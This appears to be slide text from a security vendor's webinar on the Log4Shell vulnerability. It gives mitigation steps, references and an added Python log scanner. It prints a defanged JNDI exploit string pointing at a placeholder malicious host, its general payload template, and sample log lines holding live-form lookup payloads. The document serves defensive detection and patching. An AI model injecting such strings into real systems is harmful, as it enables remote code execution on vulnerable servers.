On December 9th, researchers uncovered a critical zero-day vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228, or “Log4Shell”, is an RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control of an affected system. The vulnerability has been rated 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and malicious actors are already conducting widespread scans to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of the Global Research and Analysis Team (GReAT) in Europe, and Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion of Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
We are: Global Research and Analysis Team (GReAT)
Operational since 2008
Globally distributed elite threat research group
APTs, complex and highly sophisticated targeted attacks, big threats against banks/financial institutions, firmware threats…
Some things to know

Exploiting example:
${jndi:ldap[:]//malicious.xyz/x}
Pattern: ${jndi:[service]://[host].[port]/[path]}
JNDI: Java Naming and Directory Interface
LDAP: Lightweight Directory Access Protocol
JNDI is a Java-internal API or SPI (Service Provider Interface), e.g. methods to query information based on names via LDAP, DNS, NIS, CORBA etc.
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
[Diagram: HTTP request]
What organisations should do: solve/mitigate CVE-2021-44228

A. Identify installed log4j: check your running software.
B. Update Log4j 2 to the latest version, 2.16.0: https://logging.apache.org/log4j/2.x/download.html
C. Check logs: monitor application logs; use IDS and tools to identify attacks.
D. Alternative if you cannot patch: mitigate as outlined by Apache.org¹; use WAF, IPS and web-server block rules; use IDS, YARA and Sigma for detection.

¹ https://logging.apache.org/log4j/2.x/security.html
Kaspersky products protect!
- UMIDS:Intrusion.Generic.CVE-2021-44228.*
- PDM:Exploit.Win32.Generic
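As an added example (not code from the webinar or from Kaspersky), the following Python scans constructed web-server access-log lines for the lookup pattern shown earlier and splits each hit into service, host, port and path, which is the "check logs" step above. It assumes the usual host:port URL form rather than the [host].[port] written on the slide; all hostnames and addresses in the sample log are constructed placeholders.

```python
import re
from typing import List, NamedTuple, Optional, Tuple


class JndiLookup(NamedTuple):
    """One JNDI lookup string found in a log line, split into its parts."""
    service: str        # e.g. "ldap" or "dns"
    host: str
    port: Optional[int]  # None when the lookup carries no explicit port
    path: str


# Matches the slide's template ${jndi:[service]://[host]:[port]/[path]} with the
# port and path optional. IGNORECASE because the "jndi" prefix may be upper-cased.
JNDI_RE = re.compile(
    r"\$\{\s*jndi:(?P<service>[a-z][a-z0-9+.-]*)://"
    r"(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\s*\}",
    re.IGNORECASE,
)


def find_jndi_lookups(line: str) -> List[JndiLookup]:
    """Return every JNDI lookup embedded in a single log line."""
    found = []
    for m in JNDI_RE.finditer(line):
        port = int(m.group("port")) if m.group("port") else None
        found.append(JndiLookup(m.group("service").lower(), m.group("host"),
                                port, m.group("path") or ""))
    return found


def scan_log(lines: List[str]) -> List[Tuple[int, JndiLookup]]:
    """Scan log lines and return (1-based line number, lookup) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for lookup in find_jndi_lookups(line):
            hits.append((lineno, lookup))
    return hits


# Constructed sample access log (Apache combined format); hosts/IPs are placeholders.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:10:15:32 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:15:40 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://lookup.example:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:15:41 +0000] "GET /?x=${JNDI:dns://probe.example/id42} '
    'HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, hit in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {hit.service} lookup to {hit.host}:{hit.port} path {hit.path!r}")
```

Lookups hidden in other headers (Referer, X-Forwarded-For, etc.) are caught as long as the header value is written to the log line being scanned.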
Further references / reading material
Websites:
• Securelist: https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
• NCSC (NL): https://github.com/NCSC-NL/log4shell
• Blocklist by Costin Raiu and Markus Neis: https://github.com/craiu/iocs/tree/main/log4shell
• Apache Log4j 2 official security: https://logging.apache.org/log4j/2.x/security.html
Twitter:
• Marc Rivero López: @Seifreed
• Dan Demeter: @_xdanx
• Marco Preuss: @marco_preuss
Feel free to follow on LinkedIn and other channels as well!